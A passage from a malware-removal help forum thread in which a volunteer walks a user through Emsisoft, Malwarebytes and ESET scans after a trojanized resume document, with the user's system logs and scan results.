AMD Catalyst Install Manager (HKLM\...\{B6CEDB2C-C8F8-7213-7BDD-9409B34F77EA}) (Version: 8.0.911.0 - Advanced Micro Devices, Inc.)
AMD Quick Stream (HKLM\...\{E9EED4AE-682B-4501-9574-D09A21717599}_is1) (Version: 3.4.4.0 - AppEx Networks)
Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.64.49.0 - Conexant)
Dolby Advanced Audio v2 (HKLM-x32\...\{B9E70C7A-9F85-4A39-A4A3-BFA3C3BF7613}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Dropbox (HKCU\...\Dropbox) (Version: 3.4.6 - Dropbox, Inc.)
Energy Management (HKLM-x32\...\{D0956C11-0F60-43FE-99AD-524E833471BB}) (Version: 8.0.2.4 - Lenovo) Hidden
Energy Management (HKLM-x32\...\InstallShield_{D0956C11-0F60-43FE-99AD-524E833471BB}) (Version: 8.0.2.4 - Lenovo)
FreeRide Games (HKLM-x32\...\{6C26A305-4549-4A8A-9F03-25719C03B0FB}) (Version: 07.05.80.00 - Exent Technologies)
Intel AppUp(SM) center (HKLM-x32\...\Intel AppUp(SM) center 33057) (Version: 3.6.1.33057.10 - Intel)
Lenovo EasyCamera (HKLM-x32\...\{ADE16A9D-FBDC-4ecc-B6BD-9C31E51D0332}) (Version: 3.13.301.1 - Vimicro)
Lenovo OneKey Recovery (HKLM\...\{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.1219 - CyberLink Corp.) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.1219 - CyberLink Corp.)
Lenovo pointing device (HKLM\...\Elantech) (Version: 11.4.14.1 - ELAN Microelectronic Corp.)
Lenovo PowerDVD10 (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4331.52 - CyberLink Corp.) Hidden
Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4331.52 - CyberLink Corp.)
Lenovo Solution Center (HKLM\...\{4C2B6F96-3AED-4E3F-8DCE-917863D1E6B1}) (Version: 2.7.003.00 - Lenovo Group Limited)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Office Home and Business 2013 - en-us (HKLM\...\HomeBusinessRetail - en-us) (Version: 15.0.4711.1003 - Microsoft Corporation)
Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.3.5849.0427 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 37.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 37.0.2 (x86 en-US)) (Version: 37.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.2 - Mozilla)
Norton Internet Security (HKLM-x32\...\NIS) (Version: 21.7.0.11 - Symantec Corporation)
OEM Application Profile (HKLM-x32\...\{548083DD-D99B-2CE1-8D2B-D78BEB834F7A}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
Office 15 Click-to-Run Extensibility Component (HKLM-x32\...\{90150000-008C-0000-0000-0000000FF1CE}) (Version: 15.0.4711.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (HKLM\...\{90150000-008F-0000-1000-0000000FF1CE}) (Version: 15.0.4711.1003 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (HKLM-x32\...\{90150000-008C-0409-0000-0000000FF1CE}) (Version: 15.0.4711.1003 - Microsoft Corporation) Hidden
PDF Suite 2014 (HKLM-x32\...\{BA559A2F-BD29-41CA-8E51-79EE3B924073}) (Version: 11.0.17.14548 - Interactive Brands Malta Limited)
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.9109 - CyberLink Corp.)
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.220 - Qualcomm Atheros Communications)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
Qualcomm Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.15 - Qualcomm Atheros Communications Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.37 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
SugarSync Manager (HKLM-x32\...\SugarSync) (Version: 1.9.61.90905 - SugarSync, Inc.)
Update for CHS Microsoft IME HAP Dictionary (HKLM\...\{FD17F66D-1098-4E4A-A481-A5DCDFF73192}) (Version: 16.0.1467.1 - Microsoft Corporation) Hidden
UserGuide (HKLM-x32\...\{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.9 - Lenovo) Hidden
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.9 - Lenovo)
Windows Driver Package - Lenovo (ACPIVPC) System  (06/15/2012 8.1.0.1) (HKLM\...\71BC3FD63F450BA0A957AAECBDB4A000C4F2BE42) (Version: 06/15/2012 8.1.0.1 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid  (06/19/2012 10.13.29.733) (HKLM\...\8A223E56FB1ED4F697B54E5BF96F1EB63B512684) (Version: 06/19/2012 10.13.29.733 - Lenovo)

========================= Devices: ================================

========================= Memory info: ===================================

Percentage of memory in use: 54%
Total physical RAM: 5316.26 MB
Available physical RAM: 2427.29 MB
Total Pagefile: 6212.26 MB
Available Pagefile: 2654.43 MB
Total Virtual: 4095.88 MB
Available Virtual: 3970.77 MB

========================= Partitions: =====================================

1 Drive c: (Windows8_OS) (Fixed) (Total:891.59 GB) (Free:759.33 GB) NTFS
2 Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:22.22 GB) NTFS

========================= Users: ========================================

User accounts for \\TRAVIS

Administrator            Dido                     Guest                   
tiffa_000               

========================= Minidump Files ==================================

No minidump file found

========================= Restore Points ==================================

21-04-2015 04:31:54 Scheduled Checkpoint
28-04-2015 11:30:36 Scheduled Checkpoint
06-05-2015 01:13:12 Scheduled Checkpoint

**** End of log ****



#4 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 12 May 2015 - 11:23 AM

Hi there,

Please post the SecurityCheck log when it is finished.

Please uninstall the following software from Programs and Features:

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 16.0.0.273 - Adobe Systems Incorporated)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)

If you run into any issue, let me know.

Do you recognize this software?

ÃÀͼ¿´¿´ 2.2.7 (HKCU\...\ÃÀͼ¿´¿´) (Version: 2.2.7 - Meitu, Inc.)


After you are done, please run this.

Emsisoft Emergency Kit

Please download Emsisoft Emergency Kit and save it to your desktop. Double click on the EmsisoftEmergencyKit file you downloaded to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click the Extract button at the bottom. A folder named EEK will be created in the root of the drive (usually c:\).
  • After extraction please double-click on the new Start Emsisoft Emergency Kit icon on your desktop.
  • The first time you launch it, Emsisoft Emergency Kit will recommend that you allow it to download updates. Please click Yes so that it downloads the latest database updates.
  • When the update process is complete, a new button will appear in the lower-left corner that says Back. Click on this button to return to the Overview screen.
  • Click on Scan to be taken to the scan options. If you are asked if you want the scanner to scan for Potentially Unwanted Programs, then click Yes.
  • Click on the Full Scan button to start the scan.
  • When the scan is completed click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • When the threats have been quarantined, click the View report button in the lower-right corner, and the scan log will be opened in Notepad.
  • Please save the log in Notepad on your desktop, and attach it to your next reply.
  • When you close Emsisoft Emergency Kit, it will give you an option to sign up for a newsletter. This is optional, and is not necessary for the malware removal process.
Regards,
Alex

#5 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 12 May 2015 - 11:25 AM

 Results of screen317's Security Check version 1.001 
   x64 (UAC is enabled) 
 Internet Explorer 11 
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled! 
Norton Internet Security  
Windows Defender          
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Adobe Reader XI 
 Mozilla Firefox (37.0.2)
````````Process Check: objlist.exe by Laurent```````` 
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C:  %
[b][u]````````````````````End of Log`



#6 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 12 May 2015 - 11:37 AM

I removed the items, including the Meitu item.  It was fine, just a foreign picture editor, but I didn't need it.



#7 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 12 May 2015 - 07:18 PM

Emsisoft Emergency Kit v. 9.0.0.4700
© 2003-2014 Emsisoft - www.emsisoft.com

ID   Object
0    C:\Users\Dido\AppData\Local\Temp\lf.exe detected: Trojan.GenericKD.2396822 (B)
1    C:\Users\Dido\AppData\Roaming\Microsoft\Windows\WinStat detected: Trojan.GenericKD.2396822 (B)



#8 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 13 May 2015 - 12:06 AM

Hi there,

Please re-run EEK and chooses Quarantine for all detections.

After that run these.

Malwarebytes Anti-Malware

Download Malwarebytes Anti-Malware from here.

Double click on the file mbam-setup-2.x.x.xxxx.exe to install the application. (x.x.xxxx is the version)
  • Follow the prompt. At the end place a checkmark in Launch Malwarebytes Anti-Malware, then choose Finish.
  • When MBAM opens it will says Your database is out of date. Choose Fix Now.
  • Click on the Scan tab at the top of the window, choose Threat Scan, then Scan Now.
  • If you receive a message that updates are available, choose Update Now button (the scan will start after updates are completed).
  • Please be patient as the scan will take some time.
  • If MBAM detected threats, choose Quarantine for all items, then click Apply Actions.
  • While still on the Scan tab, choose View detailed log. In the window that opens, click the Export button, choose Text file (*.txt) and save the log to your Desktop.
Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


===

ESET Online Scanner

You will need to use Internet Explorer for this scan.
  • Hold down Ctrl and click here to open ESET Online Scanner in a new window.
  • Click the ESET Online Scanner button.
  • Put a checkmark in "YES, I accept the Terms of Use."
  • Click Start.
  • Accept any security warnings from your browser.
  • Under Scan settings, put a checkmark in Scan Archives.
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Click Scan.
  • ESET Online Scanner will automatically update and scan. Please be patient, as this scan can take quite some time.
  • When the scan is done, click List threats.
  • Click Export, then save the file to your desktop.
  • Click Back, then Finish to exit ESET Online Scanner.
Regards,
Alex

#9 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 13 May 2015 - 01:29 AM

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/12/2015
Scan Time: 10:48:52 PM
Logfile: Malwarebytes results.txt
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.12.08
Rootkit Database: v2015.04.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: Dido

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 350104
Time Elapsed: 25 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)



#10 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 13 May 2015 - 05:45 AM

Hi there,

It looks like part of the MBAM log is missing - please repost the full log.

Thank you.

Alex

#11 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 13 May 2015 - 12:34 PM

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 5/12/2015
Scan Time: 10:48:52 PM
Logfile: Malwarebytes results.txt
Administrator: Yes

Version: 2.01.6.1022
Malware Database: v2015.05.12.08
Rootkit Database: v2015.04.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: Dido

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 350104
Time Elapsed: 25 min, 27 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)


This is all I was able to export on the ESET Scan.

 

C:\Users\Dido\Desktop\My_Resume_14951.doc VBA/TrojanDownloader.Agent.PP trojan deleted - quarantined
 



#12 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 13 May 2015 - 12:34 PM

Please continue with the instruction for ESET Online Scanner. Thank you.

Regards,
Alex

#13 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 13 May 2015 - 01:15 PM

I had already ran the ESET program.  As I mentioned at the bottom of the last post.

 

 

This is all I was able to export on the ESET Scan.

 

C:\Users\Dido\Desktop\My_Resume_14951.doc VBA/TrojanDownloader.Agent.PP trojan deleted - quarantined



#14 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 13 May 2015 - 01:20 PM

I assume the file ESET quarantined is the document you mentioned at the beginning of the post.

How is the computer running?

Regards,
Alex

#15 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 15 May 2015 - 12:54 AM

Yes, the ESET quarantined file was the one that caused the original problem.  I forgot that I still had the initial file on my computer so I could copy the code out of it.  The computer seems to be running fine.  Although, there wasn't really an issue with performance in the first place.  I just was pretty sure I had launched a Trojan and didn't want it on my computer.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users